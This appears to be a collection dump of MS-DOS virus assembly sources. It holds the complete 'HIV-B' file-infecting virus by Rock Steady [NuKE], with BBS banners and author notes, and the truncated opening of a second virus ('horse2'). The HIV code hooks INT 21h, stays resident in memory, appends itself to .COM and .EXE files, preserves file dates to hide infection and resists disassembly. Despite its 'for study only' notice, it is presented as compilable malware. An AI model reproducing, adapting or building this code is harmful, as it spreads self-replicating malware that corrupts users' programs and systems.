ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START
MSDOS/H-Index/Virus.MSDOS.Unknown.hiv.asm
+843
View File
@@ -0,0 +1,843 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> HIV Virus Source :
HIV - VIRUS
Created: March 1991
Scan ID: [Murphy]
Origin: Italy ,"Italain Virus Laboratory!"
Sources: Produced by Rock Steady [NukE]
[NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup,
~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So
if you Scan it with SCAN McAfee & Ass. you will see that it will be
detected as the [Murphy] Virus! I got this Virus from Italy from the
"Italian Virus Laboratory!" Mind you this Virus Source is being
released to the public because it's an OLD Virus and is detectable!
and doesn't do any damage to the system! This virus was edited by
me, I removed some bugs inside and produced this SOURCE CODE ONLY!
[NOTE] Of course, this virus is ONLY for STUDYING, to learn on how
virus are made! After the viruses are old its NICE to release them so
people can study em!
HOW THE HIV - VIRUS WORKS
First, I'd like to thanx all those that thanked me for my latest
Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the
Source Codes to this virus in 6 MONTHS! Hopefully, by that time it
will be Detected by SCAN (McAfee & Ass) and yall will get a chance
to study this Assome Virus made totally from me...
HIV -: This virus Spreads thru coping itself to .EXE and .COM Files!
~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus
Hooks itself to Interrup 21h and totally system memory will be 1632
Bytes Less. Once the file is resident in Memory it will attach itself
to every file that is runned or opened! The date of the original file
Doesn't not change! All this virus does is Copy itself over and over
again! CleanUp V77+ will get rid of it...or Simple delete all files
Infected with the virus...Anywayz Enjoy...
NOTE: If you want to compile the source, simply look for it in the .TXT files
contained in DATA.EXE in this newsletter package.
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START
Rock Steady [NuKE]
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
MSDOS/H-Index/Virus.MSDOS.Unknown.horse.asm
+1009
View File
File diff suppressed because it is too large Load Diff
MSDOS/H-Index/Virus.MSDOS.Unknown.horse2.asm
+558
View File
@@ -0,0 +1,558 @@
.model tiny
.code
.radix 16
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
org 0100h
CALL EntryPoint ; Call virus entry point
; Here begin virus by himself
EntryPoint:
POP BP ; Restore in BP address of data area
PUSH BX ; Save BX
PUSH CX ; Save CX
PUSH ES ; Save ES
PUSH DS ; Save DS
CLC ; Clear carry flag
MOV AX,4B4Bh ; Load AX with self-check word
INT 21 ; Call int21
JC Install ; If virus is loaded CF==0
PUSH DS ; Save DS
PUSH CS ; Set DS point to PSP
POP DS ;
MOV SI,DI ; SI=DI= virus CODE begin
SUB SI,0003 ; include CALL in the beginning
ADD SI,BP ; Adjust different offsets
MOV CX,047Ch ; Compare virus code only
CLD ; Clear direction
REP CMPSB ; Repeat until equal
POP DS ; Restore DS
PUSH DS ; Set ES = DS
POP ES
JZ ReturnControl ; If virus -> return to file
Install:
MOV CS:[offset FunCounter+BP],3456 ; Load generation counter
MOV AX,DS ; Move PSP segment in AX
DEC AX ; Compute MCB of PSP
MOV DS,AX ; Set DS to MCB
SUB [0003],0050 ; "Steal" some memory
MOV AX,ES:[0002] ; ????
SUB AX,0050 ; ????
MOV ES:[0002],AX ;
PUSH AX ; Save new virus segment
SUB DI,DI ; DI=0
MOV SI,BP ; SI point to virus begin
SUB SI,0003 ; Adjust CALL in the beginning
MOV DS,DI ; DS set to 0
MOV BX,Offset int21handler ; Load BX with int 21 handler
XCHG BX,[0084] ; and set it in vector table
MOV CS:[BP+offset Int21off],bx ; Save old vector offset
XCHG AX,[0086] ; Set new int21 seg & get old segment
